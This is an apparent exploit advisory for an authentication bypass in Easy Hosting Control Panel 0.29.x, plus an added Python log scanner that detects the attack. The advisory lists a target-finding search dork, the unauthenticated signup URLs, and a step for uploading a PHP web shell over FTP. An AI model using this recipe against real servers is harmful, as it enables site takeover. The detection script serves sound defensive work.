# Exploit Title: Easy Hosting Control Panel Admin Auth Bypass
# Google Dork: inurl:/ehcp/?op=applyfordomainaccount
# Date: 10/04/2011
# Author: Jasman
# Software Link: https://launchpad.net/ehcp & http://www.ehcp.net
# Version: 0.29.10 - 0.29.13
# Tested on: Ubuntu, Debian
+ Description
Easy Hosting Control Panel is designed for hosting multiple domains on a single machine.
It runs on LAMP (Linux, Apache, MySQL, PHP). Its aim: easy to install, easy to use, non-complex, functional.
+ Vulnerable:
Adding an FTP account and a domain does not require a login.
http://site.com/vhosts/ehcp/?op=applyforaccount
http://site.com/vhosts/ehcp/?op=applyforftpaccount
http://site.com/vhosts/ehcp/?op=applyfordomainaccount
+ Exploit
Upload a shell via FTP; it is then served from:
http://site.com/vhosts/[username]/[domain]/httpdocs/shell.php
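For defenders, the sequence above leaves a recognisable trail in the web server log. The following is an added example, not part of the original advisory: it flags requests to the three unauthenticated `op` values and any later PHP request to a customer web root from the same client. It assumes Apache "combined" log format; the function name, the sample log lines and the per-IP correlation heuristic are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Operations the advisory lists as reachable without a login.
SIGNUP_OPS = {"applyforaccount", "applyforftpaccount", "applyfordomainaccount"}
# Assumed: Apache "combined" log format; only the fields used below are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) ')
# PHP file under a customer web root, following the path layout in the advisory.
WEBROOT_PHP_RE = re.compile(r"^/vhosts/[^/]+/[^/]+/httpdocs/.*\.php$", re.I)

def find_suspicious(lines):
    """Return (signup_hits, followups): requests to an unauthenticated signup op,
    and PHP requests to a web root by a client that earlier hit such an op."""
    signup_hits, followups, signup_ips = [], [], set()
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected format; skip rather than guess
        url = urlsplit(m["target"])
        ops = {v.lower() for v in parse_qs(url.query).get("op", [])}
        hit = sorted(ops & SIGNUP_OPS)
        if "/ehcp/" in url.path and hit:
            signup_hits.append((n, m["ip"], hit[0], int(m["status"])))
            signup_ips.add(m["ip"])
        elif m["ip"] in signup_ips and WEBROOT_PHP_RE.match(url.path):
            followups.append((n, m["ip"], url.path))
    return signup_hits, followups

# Constructed sample log lines (documentation address ranges, not real traffic).
SAMPLE = [
    '198.51.100.7 - - [10/Apr/2011:10:00:01 +0000] "GET /vhosts/ehcp/?op=applyforftpaccount HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Apr/2011:10:00:40 +0000] "POST /vhosts/ehcp/?op=applyfordomainaccount HTTP/1.1" 200 4312 "-" "Mozilla/5.0"',
    '203.0.113.20 - - [10/Apr/2011:10:01:05 +0000] "GET /vhosts/alice/example.org/httpdocs/index.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Apr/2011:10:03:12 +0000] "GET /vhosts/newuser/example.net/httpdocs/x.php HTTP/1.1" 200 97 "-" "Mozilla/5.0"',
    '203.0.113.20 - - [10/Apr/2011:10:04:00 +0000] "GET /vhosts/ehcp/ HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    hits, follow = find_suspicious(SAMPLE)
    for n, ip, op, status in hits:
        print(f"line {n}: {ip} requested op={op} (HTTP {status})")
    for n, ip, path in follow:
        print(f"line {n}: {ip} then requested {path}")
```

Matching on client IP misses an attacker who changes address between signup and upload, so the signup hits alone are worth reviewing on affected versions.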
+ Tested On
0.29.13
0.29.11
0.29.10